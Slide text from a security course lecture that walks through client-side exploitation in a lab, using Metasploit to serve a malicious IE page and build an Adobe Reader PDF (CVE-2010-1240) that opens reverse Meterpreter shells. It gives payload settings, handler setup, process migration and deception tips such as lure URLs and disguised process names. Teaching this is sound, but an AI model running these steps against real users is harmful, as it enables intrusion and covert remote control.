Lecture07B Client Side Exploitation
Lecture07B Client Side Exploitation
2
Lecture outline
■ What is Client Side Exploitation
■ Browser Exploitation
■ PDF Reader Exploitation
3
Recall: Client/Server Architecture
■ Many services on the Internet are provided via the
client/server architecture.
5
Social Engineering
■ In addition to the techniques of creating malicious servers
or files, an important step in client side exploitation is to
trick users to connect to malicious servers or open
malicious files.
▬ This step is typically performed by Social Engineering.
6
Social Engineering Examples
■ Littering some USB sticks containing malicious files
around the locations of targets.
■ Enticing people to click a malicious link by disguising the
link as a link for gift, voucher, etc.
■ Sending emails that appear to come from boss,
government, police, etc.
7
Assumption
■ In this lecture, we'll assume the social engineering step is
successful.
▬ That is, a user has been successfully lured to connect to a malicious
server or open a malicious file.
8
Types of Client Side Exploitation
■ One typical classification of client side exploitation is based
on the client software exploited:
▬ Browser exploitation
▬ Email client exploitation
▬ PDF Reader exploitation
▬ MS Office exploitation
▬ And much more
We'll talk about two types in this lecture: Browser exploitation and
PDF Reader exploitation
9
Lecture outline
■ What is Client Side Exploitation
■ Browser Exploitation
■ PDF Reader Exploitation
10
Browser exploitation – Overview
■ First, create a web page containing malicious Javascript,
or other type of code that will be run by browsers.
■ Then, lure users to visit this web page.
■ The malicious code will exploit certain vuln in the
browsers to gain unauthorized access to the user
computer.
11
Browser exploitation – Example
■ In this example, we'll exploit a misconfiguration in IE
browser.
▬ This misconfiguration allows remote code execution if a user views a
specially crafted Web page.
▬ A misconfiguration is not a vulnerability, but it can be as deadly as a
vulnerability.
13
Step 1. Search for the exploit
■ Suppose we know that our target is using an IE browser
with this misconfiguration.
■ We search the exploit for this in MSF:
14
Step 2. Select the exploit
■ Suppose we select the exploit with Index 0 from the
returned results.
■ NB:
▬ the payload defaults to windows/meterpreter/reverse_tcp.
▬ 'windows/meterpreter/reverse_tcp' is applicable to both 32-bit and 64-
bit architectures, while 'windows/x64/meterpreter/reverse_tcp' is only
applicable to 64-bit architecture.
15
Step 3. Set payload
■ Since we know our Win7 VM uses a 64-bit OS, it is better to
set payload to 'windows/x64/meterpreter/reverse_tcp',
which is more reliable in our scenario.
16
Step 4. Show exploit and payload options
17
Step 5. Set options
Different from server side exploitations, we encounter the following
new options:
■ SRVPORT: the port number the malicious web server will listen
on.
▬ Its default is 8080.
▬ To make this port number not suspicious, it's better to set it to 80.
18
Step 5. Set options (cntd)
■ URIPATH: the path part of the malicious URI (or URL) to
send to target.
▬ That is, the part after the host name in URL.
▬ Its default value is random, meaning a random path name will be
created.
▬ To effectively entice our target, it is better to give an enticing name such
as 'freegift', 'prize', etc.
19
Step 5. Set options (cntd)
Recall: LHOST and LPORT are the IP address and port number for the
reverse Meterpreter to connect back. Since their default values are set
properly (LHOST being the IP of Kali and LPORT being 4444) by
msfconsole as shown in Step 4, we don't need to modify them here.
20
Step 6. Launch the attack
■ Simply enter 'exploit'
▬ The web server will start listening on port 80 to serve the malicious
page: http://192.168.76.129/prize
▬ The Meterpreter handler will start listening on port 4444.
21
Step 7. Our target clicks the malicious link
■ Suppose an innocent user at Win7 clicks this malicious link.
22
Step 8. MSF starts to exploit; and a
Meterpreter session is opened
■ NB: If a Meterpreter session is not opened, you can simply enter 'sessions'
to check.
23
Summary to the previous exploitation
■ If you do 'sudo ss -antp' at Kali, you'll see that Kali has both port 80
and port 4444 listening.
HTTP
Malicious connection
Web Server Browser
at port 80
Meterpreter
connection
Meterpreter Meterpreter
Hander at payload
port 4444
24
Notes to the previous exploitation
■ Meterpreter will acquire the same privilege as IE, as it is
injected into the target through IE.
▬ If the target logs in with an administrator account, IE will have
administrator privilege. If with a limited user account, IE will only have
limited privilege.
o This is why people should login to their computers with limited user
accounts instead of administrator accounts.
■ In this example, the target logs into Win7 as 'alex' and runs
IE, so the meterpreter will have the same privilege of 'alex'.
25
Refinement to the previous exploitation
■ If you do 'getpid' and then 'ps' in the meterpreter session obtained
previously, you'll see:
28
Further refinement
■ You can manually migrate Meterpreter to the true
explorer.exe after you get the Meterpreter session. Then,
the fake explorer.exe in the previous slide will disappear.
meterpreter > migrate 2576
[*] Migrating from 2112 to 2576...
[*] Migration completed successfully.
29
Lecture outline
■ What is Client Side Exploitation
■ Browser Exploitation
■ PDF Reader Exploitation
30
PDF Reader exploitation – Overview
■ Create a PDF file containing malicious code.
■ Users are lured to open this PDF file.
■ The malicious code inside the PDF file will exploit certain
vuln in the PDF reader to gain unauthorized access to the
user computer.
31
PDF Reader exploitation – Example
■ In this example, we'll exploit a vuln in Adobe Reader before
v9.3.3.
▬ This vuln is because of no sanitization on one text field in the Launch
File dialog, which enables attackers to trick users into executing an
arbitrary local program specified in a PDF document.
▬ CVE ID: CVE-2010-1240.
▬ For more info about this vuln, see:
https://www.cvedetails.com/cve/CVE-2010-1240/
32
Step 1. Search for the exploit
■ Suppose we know that our Win7 VM is using Adobe
Reader v9.2.
■ We search the exploit for it by using the CVE ID:
33
Step 2. Select the exploit
■ Our experience suggests that the exploit with index 1 has a
larger chance to succeed, so we'll select it in our demo.
■ NB:
▬ the payload defaults to windows/meterpreter/reverse_tcp.
▬ 'windows/meterpreter/reverse_tcp' is applicable to both 32-bit and 64-
bit architectures, while 'windows/x64/meterpreter/reverse_tcp' is only
applicable to 64-bit architecture.
34
Step 3. Set payload
■ Since we know our Win7 VM uses a 64-bit OS, it is better to
set payload to 'windows/x64/meterpreter/reverse_tcp',
which is more reliable in our scenario.
msf6 > set payload windows/x64/meterpreter/reverse_tcp
payload <= windows/x64/meterpreter/reverse_tcp
35
Step 4. Show exploit and payload options
36
Step 5. Set options
■ EXENAME: the name of the meterpreter process shown in the
target.
▬ A hacker will choose a deceptive name rather than its default value. E.g.,
iexplorer.exe, svchost.exe, etc are all good choices.
37
Step 6. Generate the malicious file
■ Simply enter 'exploit' or 'run'
▬ 'run' is an alias for 'exploit'.
▬ The malicious pdf file named voucher.pdf will be generated.
38
Step 7. Create a handler to receive the
reverse Meterpreter connection
■ This is done through the module exploit/multi/handler.
▬ This module with proper payloads can create handlers (servers) to wait
for connection requests from Meterpreter sessions, shell sessions, http
sessions, etc.
■ See the next slide on how to set its payload and options.
39
Step 7. Create a handler to receive the
reverse Meterpreter connection (cont'd)
■ Usually we cannot accept its default payload.
■ We need to set the handler's payload and options exactly the same
as those when we generate the malicious pdf.
■ Then, we start this handler to wait for meterpreter's reverse
connections.
40
Note to Step 7
41
Step 8. Send the pdf file to the target
■ Suppose we use certain social engineering technique such
that the target downloads the voucher.pdf to his/her
"Documents" directory.
■ In our lab, we can use nc to upload voucher.pdf from Kali to
Win7.
■ Since voucher.pdf is stored in the directory /root/.msf4/local/
and this directory requires root privilege to access, we need
to get a linux shell under root account first.
■ This can be done by the 'sudo zsh' command, where 'zsh' is
the default shell program of Kali Linux.
▬ See the screenshot in the next slide.
42
Step 8. Send the pdf file to the target
(cntd)
A shell under root
is obtained.
A root shell has
the prompt symbol
'#'.
43
Step 9. Target opens this malicious file
■ Adobe Reader will prompt user to confirm 'Open'. Here we assume
that the user fully trusts this file and will open it.
44
Step 9. Target opens this file (cntd)
■ After the user clicks the 'Open' button, the Meterpreter
payload embedded in the pdf will be run, and it initiates a
connection to the waiting handler at Kali.
■ NB: Adobe Reader will show a blank pdf. If you want to
generate a pdf with some contents, it can be achieved by
using the advanced options of the
adobe_pdf_embedded_exe_nojs module. You are welcome
to explore this one by yourself.
45
Step 10. At Kali, the Meterpreter handler
receives the connection
■ The Meterpreter connects back to the handler at Kali, thus a
Meterpreter shell is successfully obtained.
46
Step 10. At Kali, the Meterpreter handler
receives the connection (cntd)
■ We can check the user account, process id, process name, etc.
■ We see that the process name is indeed the one we have specified:
iexplorer.exe.
47
Defence to client-side exploitation
48
Example Short Answer Question:
■ What is social engineering? Also, give some examples of
social engineering.
49
Lecture Summary
■ Netcat is a lightweight multi-purpose networking tool,
nicknamed ‘Swiss Army Knife’.
■ Client-side attacks are very popular today, because client-
side programs are used by everybody.
■ MSF can easily succeed in client-side attacks if client-side
programs are not well protected.
50
References
■ Online Tutorial from Offensive Security: Metasploit
Unleashed
▬ https://www.offensive-security.com/metasploit-unleashed/
51